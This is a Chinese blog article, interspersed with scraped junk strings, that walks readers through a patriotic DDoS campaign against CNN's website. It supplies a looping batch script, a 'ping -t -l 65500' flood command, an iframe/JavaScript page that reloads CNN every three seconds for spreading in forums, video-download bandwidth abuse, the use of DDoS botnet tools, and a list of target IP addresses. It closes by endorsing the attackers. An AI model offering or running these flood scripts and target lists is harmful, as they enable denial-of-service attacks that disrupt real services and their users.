全民红客 CNN攻击技术解析

近期，CNN主播卡弗蒂对于中国人民带有强烈歧视性的言论，以及CNN对于这一事件缺乏诚意的道歉和对于中国政府的无端指责，激起了全国人民的强烈愤慨。于是在一些爱国技术人员的倡议下，广大网民发起了一场针对CNN官方网站的攻击行动。下面，笔者从技术的角度对这次攻击中采用的攻击方法进行解析。IXPUB技术博客'g!jv6Oy
a.A6i#k

　　一、攻击技术IXPUB技术博客s)r:Rj,f

IXPUB技术博客6a Fnp.r O

　　这次攻击采用的是DDOS攻击方法，即英语“Distributed Denial of Service”的缩写。顾名思义，即是利用网络中的无数计算机，向某一特定的目标计算机发动密集式的“拒绝服务”要求，从而把目标计算机的网络资源及系统资源耗尽。这是一种最有效而且难以有效防范的攻击技术。IXPUB技术博客F;yw%ww%TQ.Q

IXPUB技术博客(@0xxp nZHE

　　1.手动攻击IXPUB技术博客7n8nvB+u/\

[^5Yi;]P/Yw#vk0　　在浏览器的地址栏中输入CNN的网站地址http://www.cnn.com，频繁登录访问其网站。其实这算不上攻击，但是当有数以万计的人同时登录时同样会耗费其网络带宽、系统资源，造成网络拥堵。IXPUB技术博客7Dr(Rwx~j3X

IXPUB技术博客q3oe,]4z
J

　　2.批处理脚本IXPUB技术博客${P{4G
g$m

DP y[iT0　　把以下代码保存为一个.bat文件，比如cnn.bat，然后直接双击运行即可。

lpi(X]s:YS\z0IXPUB技术博客v'sjS4} n

@echo off Q(a_+q!^:F&j0　　:testIXPUB技术博客kn$DNJ 　　taskkill /f /im iexplore.exeIXPUB技术博客8N1T8u,t U%P3k 　　start http://www.cnn.comIXPUB技术博客9hs!kqQn 　　sleep 2 C[jvI"Jl QW0　　goto test

CXVnG0t5?0

4HBF9|&x(CO0　　解释：每隔1秒钟关闭IE进程，循环访问http://www.cnn.com。比上面的手动攻击更方便，但是IE窗口关闭又开启影响正常工作，适用于电脑闲置时。(图1)IXPUB技术博客6e*x.|`*h }`e,I\"T

]8x#v*f1v v$D0　　IXPUB技术博客IW*uZ}+lf2S4X.? O+f

IXPUB技术博客(}
o.p ITdv*O,j$Q

+w)Mbw+?5U0　　3.ping攻击

Mg$x?_/Ve-h0

W5i X9j:eqb0　　在命令行(cmd.exe)中输入如下命令：IXPUB技术博客:wZY0Z!]4l;O

Dw?XW3W;G:Y!j#mCz7n0　　ping www.cnn.com -t -l 65500IXPUB技术博客df(G}x6o+~

IXPUB技术博客kw
s0DhR%wCo

　　解释：持续不断向www.cnn.com发送65500字节的数据包，当然只有一台机器发送没有效果，当数以万计的机子发送的时候才见威力。(图2)IXPUB技术博客,C+`FeyrT`8J\

IXPUB技术博客&_v)dO6\^

IXPUB技术博客.\bCV Y%kTK v0J

　　4.脚本攻击IXPUB技术博客suO+ba:`5\4|:b#LM

L@0_Z y SjI&Q-t0　　网友在QQ群、论坛、百度贴吧等其它地方发布如下网页代码，把它保存为cnn.htm文件，然后双击打开即可。IXPUB技术博客,U#H g'{t

9m;]Y*N Osg'Oh0

<iframe id="cnn" width="100%" height="100" ></iframe>IXPUB技术博客 N yMy[p <script> vt,V5p;Hd5k0var e=document.getElementById('cnn'); j?V7`2^0setInterval("e.src='http://www.cnn.com'",3000);IXPUB技术博客!b)~ g.C Z2m!k </script>

]b,w$]"mQQ%v.w|0IXPUB技术博客7o ]9l z1~

　　解释：在网页中嵌入一个框架，每隔3000毫秒打开CNN的网站。不用人工参与，也不影响正常工作。IXPUB技术博客3b/N6f"OH_l_L

:jtOw'j(t U0　　另外，有些网友做好了攻击网页，以链接的形式在论坛或者QQ群等地方发布出来，大家只需点击即可。比如：

} _)cLtX#y7_!k/{!@0IXPUB技术博客"\r$v;V`X+i5d

　　http://www.test.com/cnn.htmIXPUB技术博客s A5[ OPS"z*c:w

IXPUB技术博客p ]F9h4B2x

　　其cnn.htm页面的核心代码也就是上面的网页脚本代码。(图3)　　

B;{8Y:kS:r0

IXPUB技术博客&RrjX[1[-]m

s [yC5^Oj04.下载攻击

&F|0i%pvP0

-M%?:uY:U.e"U0　　登陆CNN网站的“http://edition.cnn.com/video/”页面，看到看到类似的链接

DM&jU+INvl:tx0IXPUB技术博客?G [
p ~z5}7hX7nC

　　java script.:cnnVideo('play', '/video/politics/2006/03/01/henry.port.politics.wed.cnn')

iefe;f WQl'pPG+a0IXPUB技术博客zT:R4w0` O

　　只用把文件的头和尾改一下即可。最后下载文件的地址是IXPUB技术博客*Z/_wj.H&xPqV$y

IXPUB技术博客B"K'L;{#BI4Q?

　　mms: //wmscnn.stream.aol.com/cnn/politics/2006/03/01/henry.port.politics.wed.cnn.ws.wmv

7x;C4b&L%`0f'^
Xs0

7k2@"z:Ie0　　随便用一下可以下mms格式的工具把它下下来即可。IXPUB技术博客3o'ui;]W-|{ Bk

IXPUB技术博客c9Y#l*^3E3`Z

　　或者是类似这样的链接，用下载工具下载IXPUB技术博客0n&rMU^Q

IXPUB技术博客RW u4@*FT }9]o

　　http://i.cdn.turner.com/cnn/.element/js/2.0/video/xmp/FlashMediaPlayer_0_1_524_1663.swf

/@1J Ps8|TB0

%]7A3KM}~"k_xdM0　　视频下载肯定会占用大量的带宽，从而造成网络的拥堵。IXPUB技术博客b J J&W$|e

fG)e!r3rK0　　5.工具攻击

%\ QB9Mq3b-W1b ^y0

)w3y0M;}8U0oA1@!l0　　利用类似上兴网络僵尸这样的DDOS工具，组织大量的主机进行集中的攻击。这些工具的操作非常简单，只需要输入攻击的IP和端口(本例中的80)即可。网友也公布了CNN的一些动态IP地址。(图4)

*ZzHv+?`0

IXPUB技术博客ft aU
?]I8S

d:ag4n3N&M a a2y0　　64.236.29.120、61.236.16.52、61.236.16.20 、61.236.91.24 、61.236.91.23、61.236.91.22IXPUB技术博客*U9Q @(C oA!vW

l'~0hd7UG0　　61.236.91.21 、61.236.29.120 、61.236.24.12 、61.236.22.112IXPUB技术博客+hhD&V\'l.TA

IXPUB技术博客VT6b G:}Y

　　二、攻击效果IXPUB技术博客!\6A*bT}i J

IXPUB技术博客+gFa&S*g

　　这两天的攻击效果比较明显，CNN的网站一度无法浏览，如图5所示。来自CNN官方的消息称：CNN网站遭到攻击，浏览其新闻网页受到干扰，导致亚洲部分地区的网速变慢很多。(图5)

C"d2YF8JE0

rQSagbn0

0r1jAt9\6jf.O:Z0　　由于CNN采取了动态IP和负载均衡技术，这一轮的攻击只是造成了亚洲地区的访问堵塞，其他地方仍然可以访问。因此，预计新一轮的攻击会通过国外代理，然后实施攻击。

!]p+O iB*lI(c!R0

1T3}9I(e)Z[ w2w1`o)P0　　总结：笔者只是从技术的角度进行解析，对于广大网民攻击CNN网站的行动不予以评论。但毫不隐讳自己对广大网民爱国行为的强烈支持，以及对CNN的强烈愤慨。

Ca u[ gb0